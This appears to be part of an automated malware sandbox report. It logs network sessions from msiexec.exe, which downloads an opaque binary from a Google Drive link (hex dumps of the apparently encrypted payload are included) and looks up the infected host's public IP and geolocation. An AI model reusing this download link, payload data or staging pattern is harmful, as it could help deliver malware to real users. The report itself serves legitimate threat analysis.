                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Mar 7, 2025 16:21:16.371177912 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:16 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          7192.168.2.849707132.226.247.73803488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Mar 7, 2025 16:21:18.996409893 CET151OUTGET / HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Mar 7, 2025 16:21:19.715512991 CET273INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:21:19 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 104
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          0192.168.2.849690142.250.184.2384433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:20:43 UTC216OUTGET /uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                                                                                          Host: drive.google.com
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2025-03-07 15:20:44 UTC1610INHTTP/1.1 303 See Other
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:20:44 GMT
                                                                                                                                                                          Location: https://drive.usercontent.google.com/download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                          Content-Security-Policy: script-src 'nonce-UEBnUmeEKuFc_eqnZ4AnZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                          Connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.849691172.217.16.1934433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:20:46 UTC258OUTGET /download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download HTTP/1.1
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Host: drive.usercontent.google.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-03-07 15:20:49 UTC5029INHTTP/1.1 200 OK
                                                                                                                                                                          X-GUploader-UploadID: AKDAyIsWdlIJYqiY0hYmCQ6g60k9qn4IrXJaTNY9oG_UHeJpSDm_RTLGGgo7GvJQx42JW_ENT1XMYhU
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Content-Security-Policy: sandbox
                                                                                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Content-Disposition: attachment; filename="GyHBvaByReCcAlfPocsb66.bin"
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Length: 276032
                                                                                                                                                                          Last-Modified: Tue, 25 Feb 2025 07:29:52 GMT
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:20:49 GMT
                                                                                                                                                                          Expires: Fri, 07 Mar 2025 15:20:49 GMT
                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                          X-Goog-Hash: crc32c=24gx0Q==
                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2025-03-07 15:20:49 UTC5029INData Raw: e7 2c 13 6b c5 ca e7 ff ae 32 86 62 98 db 4a 4d 2a 30 72 5d f6 8d 4c 67 c7 62 62 08 d9 f3 b0 f6 60 7b 71 05 f5 13 93 0f c8 55 8f 85 30 5e 08 a0 af 0a f9 60 05 65 c7 76 7a 08 fd 38 3a 03 80 c8 0a f5 cc c3 58 19 d6 8e d5 e7 0e f6 05 b1 06 8f 79 bd db 36 be 87 d8 98 54 dd de 0d 1d 8d b7 d1 7c 89 f2 c8 ad e9 63 b8 f3 f6 fc 4e 64 05 35 21 0f 6e fb 7e 1a 88 1d 2a 0a 4f 81 c8 82 82 05 b1 96 be 3e 1b 6c 21 49 d6 1d 5c f4 de 88 7d f4 6c c4 45 13 00 e0 a2 82 90 1d 15 cd 67 9c 87 34 19 ec 95 3e be 4b 9e 81 49 d8 ea ef 90 7d 61 23 13 02 d1 8f c7 78 e5 2a a3 dd ab 41 27 5c 2a 57 a7 69 36 4f 63 a7 07 c1 1f ac 34 e3 27 76 62 8a 6d 1c 44 94 e4 e6 81 e8 8f 5b a3 65 78 87 77 37 6f 22 00 6c a9 c1 a4 6f 33 63 3a 7d 88 6a e0 61 9a 29 ec 42 59 37 9a 01 fb 4b 10 da dd 97 39 81
                                                                                                                                                                          Data Ascii: ,k2bJM*0r]Lgbb`{qU0^`evz8:Xy6T|cNd5!n~*O>l!I\}lEg4>KI}a#x*A'\*Wi6Oc4'vbmD[exw7o"lo3c:}ja)BY7K9
                                                                                                                                                                          2025-03-07 15:20:49 UTC4642INData Raw: 4f 77 4b 60 0b 70 e2 b5 2a c2 34 24 4c ff b9 05 3d 17 c6 45 99 e9 6a 31 bf 57 d1 67 05 f4 1a 91 00 d5 fb 9f 34 6d 24 bc 0c 45 52 73 39 77 1f 11 6b 33 3b c2 84 d7 7a 60 ff 2c d4 b8 03 a4 2f 44 e8 b5 6b de 78 ce ca 20 13 ad 62 9f 6a b4 f3 67 24 b7 ec b4 e5 48 74 2c 6a ef 89 45 8f 28 a7 54 59 7d 9d a5 24 b2 25 6d 7c 00 0c 45 46 97 be 40 30 49 99 eb 66 48 74 30 74 a2 f7 70 d3 54 e6 7c fd 23 87 e7 06 24 21 c3 5d de 92 0d 47 04 e8 27 73 d5 9f 14 58 54 9a 56 96 f1 38 c2 48 41 cc 6c 14 50 53 97 17 9a 64 ba 1c d3 76 38 3b 85 dc e6 cc 78 d0 9e 5d df 05 da 7a 25 d8 37 b9 7f 6c 5f 6d 2b fb a0 10 5b 69 7c 11 3a 9b ec 5c 50 c1 78 bf f8 bb bf fc 38 23 6f 92 e7 cc 79 92 90 ea 78 3d 15 9f 8f a8 87 50 d1 a4 e0 42 83 7f 2f 03 7f 16 b1 7a e7 2d 94 0e 72 69 53 81 96 08 33 f3
                                                                                                                                                                          Data Ascii: OwK`p*4$L=Ej1Wg4m$ERs9wk3;z`,/Dkx bjg$Ht,jE(TY}$%m|EF@0IfHt0tpT|#$!]G'sXTV8HAlPSdv8;x]z%7l_m+[i|:\Px8#oyx=PB/z-riS3
                                                                                                                                                                          2025-03-07 15:20:49 UTC1322INData Raw: 2c 97 bb cc 55 38 a7 8c 43 fb 51 52 5e 3c 07 06 85 92 4e 36 59 b9 d7 9e 60 c9 a9 d8 0b f7 2e 1a 3f 8a 20 19 60 0c df 60 96 43 66 58 e7 8a 9e ec fc 81 1a 23 b7 b3 f8 bf 0f f9 bc 4b 1a eb 45 72 23 59 9b ea 3c b2 e6 55 a6 7b 7e 74 a8 a6 0d c6 13 f0 a9 79 2c 59 af e8 97 b8 cd 64 6a 0d 89 fc e6 93 ad 4e 23 d5 8e 4e fa 26 60 92 60 eb 21 33 33 27 59 19 63 7b a6 d4 f9 63 54 53 5f 97 0c 16 8a f1 99 30 96 6f e5 36 c6 e5 34 72 42 f3 a8 65 3f 3d e1 4a e3 9f 36 40 66 80 ce 60 3d 9c 3a 6b 00 5c d9 76 9c 08 f1 c4 e4 f8 97 7f 40 dc 59 03 4b 6e b7 e4 67 2f d5 a9 fc 8f 53 a4 e5 1a 99 09 0d 66 6b 04 27 6e 87 d7 41 8a b0 d6 b5 9c 2a 38 8b 2a 6f 89 d9 1a 21 d4 67 3a 2a 57 27 ac d4 00 52 bc 44 7f ba 0f 97 80 4e 8c 5a f9 c4 34 73 f9 e0 71 fe 72 7d 69 b0 42 39 9a d6 46 29 4d 94
                                                                                                                                                                          Data Ascii: ,U8CQR^<N6Y`.? ``CfX#KEr#Y<U{~ty,YdjN#N&``!33'Yc{cTS_0o64rBe?=J6@f`=:k\v@YKng/Sfk'nA*8*o!g:*W'RDNZ4sqr}iB9F)M
                                                                                                                                                                          2025-03-07 15:20:49 UTC1378INData Raw: 30 1b 8f 67 23 be 28 60 c8 86 6c 5c 85 4c 44 40 28 75 ac 6d a3 a1 58 9c e1 47 e2 b0 6c fd 6e 83 23 4f 98 ba 1e 86 95 05 5b 9d f3 4d b3 25 e2 5c fb c3 3f 14 c5 ec f7 84 63 22 74 a2 bf 1e bc 6a 6c c0 63 3d 86 af e8 99 90 84 6c 05 c6 fb 64 fe 80 d9 77 64 dc 98 41 65 51 1e d8 48 ae 2b 33 24 23 eb c2 62 7b ac f1 0f 59 54 42 51 a8 1b 07 a6 fc 98 30 9c bb e5 ea 18 f6 11 24 42 f3 a8 6b 5e 6f e3 62 f1 89 1e c9 bb ea c2 76 c3 9d 29 4b 6f 4e e0 b8 98 7a a6 ee be 88 81 5d de 51 18 09 5d 91 93 e1 13 7a dc 90 43 2f 76 b3 b3 83 99 09 03 b6 7f 1e 55 40 9e ff b2 28 95 c5 dd 5a 2b 2b 88 99 4d aa 9d 99 2e d4 17 8c f1 4a 64 86 d4 06 25 7d 61 63 c2 b7 fc 80 3e 24 72 fd 06 34 79 9c af 79 ef 70 10 72 ab cf 7c e9 15 47 0c 51 89 78 2d 11 28 c5 84 d7 31 bf 04 8c ac 89 89 88 8b 2f
                                                                                                                                                                          Data Ascii: 0g#(`l\LD@(umXGln#O[M%\?c"tjlc=ldwdAeQH+3$#b{YTBQ0$Bk^obv)KoNz]Q]zC/vU@(Z++M.Jd%}ac>$r4yypr|GQx-(1/
                                                                                                                                                                          2025-03-07 15:20:49 UTC1378INData Raw: e5 0e 05 cc 83 21 ad 84 a9 5f 27 dc 98 39 46 4f 0f c8 12 bc 29 33 52 35 1e 36 63 7b a6 c2 d9 6c 47 47 4a be 3d 40 8f 9e 98 30 82 9b e3 d7 18 f6 17 29 15 f3 a8 65 04 5c e1 62 8b 9f 45 88 bb ea c2 73 3b 8d 3c 15 44 6e d9 72 eb b9 a6 c6 ee e7 45 57 c3 d6 59 18 5b ff 73 f7 61 34 ad ad 33 8d 57 cb 5d 35 99 03 09 05 5c 74 4d 0e 91 8f ea 3c b0 dc a9 10 ab 3b 8c 4b 40 eb ef 1b 2b bb a0 2e d4 5b 1a bd d2 1d ac 9e 44 7f b1 02 e5 f2 fc 95 5a fa a4 11 64 db 45 79 ef 70 a1 76 a8 30 63 e6 15 36 8b 62 e2 c2 07 11 58 63 03 e5 03 7b ca 9c a6 5b 0e b8 8e 71 0b 3b f9 8d de 52 35 91 87 72 0e 5d c4 86 de 16 d1 9b e7 ae 08 86 2b 2f 5a b0 a3 c5 46 b3 f0 d1 ad 26 bb ec 7f 87 00 cb 73 39 96 2a 65 06 85 2c 9b db 24 a1 10 a4 ae 2c 7a 65 cd 89 59 ef db 61 3e 80 df 97 00 f1 3f 11 68
                                                                                                                                                                          Data Ascii: !_'9FO)3R56c{lGGJ=@0)e\bEs;<DnrEWY[sa43W]5\tM<;K@+.[DZdEypv0c6bXc{[q;R5r]+/ZF&s9*e,$,zeYa>?h
                                                                                                                                                                          2025-03-07 15:20:49 UTC1378INData Raw: 76 99 6e 58 c5 e2 9e 7f 54 9c db 4f f7 5c cf 48 e6 15 78 d3 90 32 a5 67 a4 9b 3f 47 cf 29 27 5a 0c a7 36 17 ff c2 80 ca db 8f 64 03 49 8c 3b 62 b0 c5 1b 20 c4 67 2e d5 51 1b ac 5d 98 21 d3 ce 7f b0 27 e0 b0 4a 86 06 8a 06 34 6c f3 f3 68 ef 67 8e 12 b0 42 3c cc 03 34 c5 53 fb cc 9d 34 4f 4f 17 c0 19 03 a6 a9 be 59 f2 9f f9 01 a9 14 8f 3b e6 52 3f 95 5b 7c 14 2f 42 fa 33 66 73 b4 ef d7 05 80 44 fa 35 5e a9 d4 4b 7e 06 cd df 34 af 92 33 25 28 b8 00 f0 9c 21 47 a2 8d 52 a0 dc 4b f9 62 f3 a6 20 02 79 ce 0a 5f c5 ca 47 c9 81 1a 99 11 f8 33 1d 79 2b 51 17 fb c6 15 8e 91 88 4b d7 4f c6 be bf ae 57 ad 01 96 79 ed b6 9b c6 e1 1b fa db f7 b3 eb 77 f0 88 e5 e9 3e 44 ee 55 9f ff 68 a8 f1 7c eb c4 9b 8b d0 a9 08 b4 08 2a e4 cd e2 93 55 19 65 a1 e0 63 88 8f 69 70 74 da
                                                                                                                                                                          Data Ascii: vnXTO\Hx2g?G)'Z6dI;b g.Q]!'J4lhgB<4S4OOY;R?[|/B3fsD5^K~43%(!GRKb y_G3y+QKOWyw>DUh|*Uecipt
                                                                                                                                                                          2025-03-07 15:20:49 UTC1378INData Raw: 71 34 73 f9 e0 6d 91 4c 03 53 b4 30 3f f8 15 36 3f 6f 78 bc 3f 1b 4e 99 a0 d3 0c 18 11 b5 70 2b ac 90 ef 59 73 31 96 4f de 72 3f 9d f9 59 26 24 c0 f5 39 16 c0 85 dc 7d 19 80 4e ed 4c c2 bd c5 41 ac 5d fc ad 2c bf e0 59 96 00 bf 11 e6 be ff 6f 15 87 41 bd a9 08 b4 62 83 84 7a 0a 73 ef 19 41 fe c9 05 ad 86 cc ee 7e 2e 13 1d 73 3a 79 33 e7 c6 1f 9b e9 09 17 d7 45 be f7 a7 bf 3f c9 51 04 79 9d d3 5a 38 e2 1b fc f3 5b a5 f2 f9 e7 d1 8a 31 3a 36 b3 57 8e 97 11 59 72 7c e1 dd 97 64 cb b3 16 9b 3d 32 6a a4 99 1d 03 19 6f a0 d9 54 e7 23 63 02 5c ca 43 8c a1 aa 14 8e 0e 20 9c 93 53 6e 1c ef c9 b3 fe 71 bd 6e f7 ad aa 24 e1 51 a2 45 ea 59 c8 d9 7c b1 43 26 7d 4a 5d 71 af 2c 25 1c d7 23 19 6f 65 53 69 f4 37 c4 93 9d 2e 87 ca 44 54 b5 a8 0a 8f 1e 36 c6 17 3f 56 a4 24
                                                                                                                                                                          Data Ascii: q4smLS0?6?ox?Np+Ys1Or?Y&$9}NLA],YoAbzsA~.s:y3E?QyZ8[1:6WYr|d=2joT#c\C Snqn$QEY|C&}J]q,%#oeSi7.DT6?V$
                                                                                                                                                                          2025-03-07 15:20:49 UTC1378INData Raw: af 2d cf 00 fa e4 08 7f 15 fd 45 27 d8 24 a5 63 d6 ba 52 4e 73 e5 0e 71 eb d1 77 c6 ee 77 9e 11 f2 61 8f 6f 3a 21 41 bc c6 15 80 80 2d 4b d7 41 9c ae be ae 2d c5 36 15 79 e9 94 c7 38 e2 1b 5e f6 57 a0 c3 cb 8e bb ef 9d be 36 b9 56 94 8f 79 f2 12 6c eb be e2 c8 d1 a2 05 8d 2b 55 a6 cd f6 47 7d 5a 65 a0 cc 3d 36 8f 63 08 39 75 52 94 c4 70 3c d4 04 33 8d 9f c5 40 67 ef c8 9c fb 19 a0 62 84 76 08 01 fc 6a 08 54 f6 3c 17 fc 64 c9 0e 34 6c 26 90 f9 b6 52 17 1c c6 3d d4 e6 7f 21 58 f7 26 af 5e 63 35 f9 e0 44 54 89 c9 2f 93 6c 2e d0 01 67 8c 8c 53 bc 5d 85 ee b3 95 d3 b0 53 24 20 e4 f5 30 41 33 59 61 d5 15 8e 8d 88 2f 41 24 bb eb ef b7 be dd f6 36 77 0d 00 d5 30 40 4f f3 c0 f3 e4 1f af 7b c4 6e 19 88 77 ac 6c 77 de 9a b1 b6 c5 41 c8 7f cb 12 60 f6 fb 4e 2d 77 11
                                                                                                                                                                          Data Ascii: -E'$cRNsqwwao:!A-KA-6y8^W6Vyl+UG}Ze=6c9uRp<3@gbvjT<d4l&R=!X&^c5DT/l.gS]S$ 0A3Ya/A$6w0@O{nwlwA`N-w
                                                                                                                                                                          2025-03-07 15:20:49 UTC1378INData Raw: 3a 3c b9 4b 12 ce 7e 80 73 59 fd bc 10 7e d1 d2 27 cf 2c 2b e2 6f d3 54 7d 5c 65 a0 cc ec ad 97 11 be 47 ca 22 bc 8f 70 14 88 a6 16 9e fc 0e 01 67 eb 6b 9c f7 19 44 65 84 76 08 01 f0 59 33 15 f6 36 b4 fc 6a c9 3a 2b 6c 26 90 f9 b8 04 99 1c c6 33 d4 e6 7d 21 b5 e2 26 af 5e 63 37 af 76 44 54 87 c9 2f 95 6c 72 d4 01 67 8c 8c 53 bc 5d 85 23 c7 e2 d3 ba 55 30 37 18 8c 4d 2e 83 27 7e df 15 8a a2 ae ee 41 2e c3 7e f4 bf d8 fd 3b 5f 18 55 11 ca 2b 55 6e d9 6c f3 e2 15 72 d0 c9 6e 10 81 58 91 03 76 d4 89 9b b6 31 fd db 5a e9 f8 60 f6 f1 5d 29 09 0d be ba a0 1c f8 73 c7 15 85 81 dc 21 b2 de 58 89 4a 7d 2a 61 c3 8c e4 c2 34 24 64 a5 b9 04 37 0a 4b d3 98 e9 6b cc a8 25 dd 61 05 84 b8 f2 17 fd 4c 84 04 64 86 28 14 37 0c 6f 39 07 ac 34 72 65 66 c2 84 d9 d3 42 cd 04 ef
                                                                                                                                                                          Data Ascii: :<K~sY~',+oT}\eG"pgkDevY36j:+l&3}!&^c7vDT/lrgS]#U07M.'~A.~;_U+UnlrnXv1Z`])s!XJ}*a4$d7Kk%aLd(7o94refB
                                                                                                                                                                          2025-03-07 15:20:49 UTC1378INData Raw: 56 38 ca 51 2d 3c 17 d7 32 4f b4 64 53 63 f4 32 21 fa 7b 2e 87 c6 37 37 8d 6b 00 a7 7a 36 c6 0b 17 5d 66 24 bc 57 9c 8d fe 99 ad 80 5f 23 2c 19 5f 5a 2e f9 36 a5 df 15 84 8a f6 e2 2e e1 b1 e6 ec c1 95 d5 78 5b 77 95 00 d5 30 40 57 90 1e 99 f4 15 df 8d 7e 6e 10 ae 02 25 13 76 ae b2 e0 b6 19 95 b4 9d e3 26 6a f6 e0 51 5b 7b 2f be ca 8c d8 af 71 cd 17 d7 bb 5f 51 9a 8f 4e 77 41 01 c3 70 e2 bf 2a ea 40 24 4c f9 aa 09 15 62 c6 92 9e fa 64 f8 b3 24 01 77 05 fe 09 d8 11 db 89 54 04 6e 2e 1e 1c 54 5e 0f e8 77 0e 1b 7a 14 2c 7a 92 dd 01 19 c8 76 d4 bc 21 ee 40 18 e2 c7 8d a1 1e be b9 f8 13 aa 77 e0 34 d5 f3 6d 25 c9 87 db 34 42 74 21 7c 90 93 89 99 22 d0 45 2f 7d 9d ab 63 91 25 6d 7c 7e e0 26 2d e7 cd 98 23 4d 93 95 b1 40 63 49 18 dc cb 7a c0 55 95 a4 f8 50 e0 f4
                                                                                                                                                                          Data Ascii: V8Q-<2OdSc2!{.77kz6]f$W_#,_Z.6.x[w0@W~n%v&jQ[{/q_QNwAp*@$Lbd$wTn.T^wz,zv!@w4m%4Bt!|"E/}c%m|~&-#M@cIzUP


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.849693104.21.80.14433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:20:54 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-03-07 15:20:55 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:20:54 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 3411
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 07 Mar 2025 14:24:03 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sqEPi22pkuW7TpGNaXI3WleKJUpgGxAvxrVsO9k7kvUysNRFUJUEEYnZNa5oLlCRc5ImrS27XgyWZP%2FeTXiqGj1%2BrYOm6j4dAFaCaHeKl%2F9WXrCK3O5s885cZfYdU2%2BKPKh%2FCAI1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 91cb145f793fc5bb-IAD
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=121513&min_rtt=39936&rtt_var=152633&sent=7&recv=9&lost=0&retrans=2&sent_bytes=5700&recv_bytes=699&delivery_rate=7480&cwnd=242&unsent_bytes=0&cid=ae8324f5371f9de7&ts=1084&x=0"
                                                                                                                                                                          2025-03-07 15:20:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.849694104.21.80.14433488C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-03-07 15:20:57 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          2025-03-07 15:20:58 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 07 Mar 2025 15:20:57 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 3414
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 07 Mar 2025 14:24:03 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YfIkhG9g8x6o1NVPFYvXuRFedADMHcgK%2Fh3awBGpREL2pYvN9rS8d3x9bC7yZcdpjSuBPkVYoGNTbtt1CWyAORYPw2ySfG9%2F3jQnQtr1ZumMFuHHb4xktB3Os2aRioaGUaR44Nqo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 91cb14720b5e874e-IAD
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
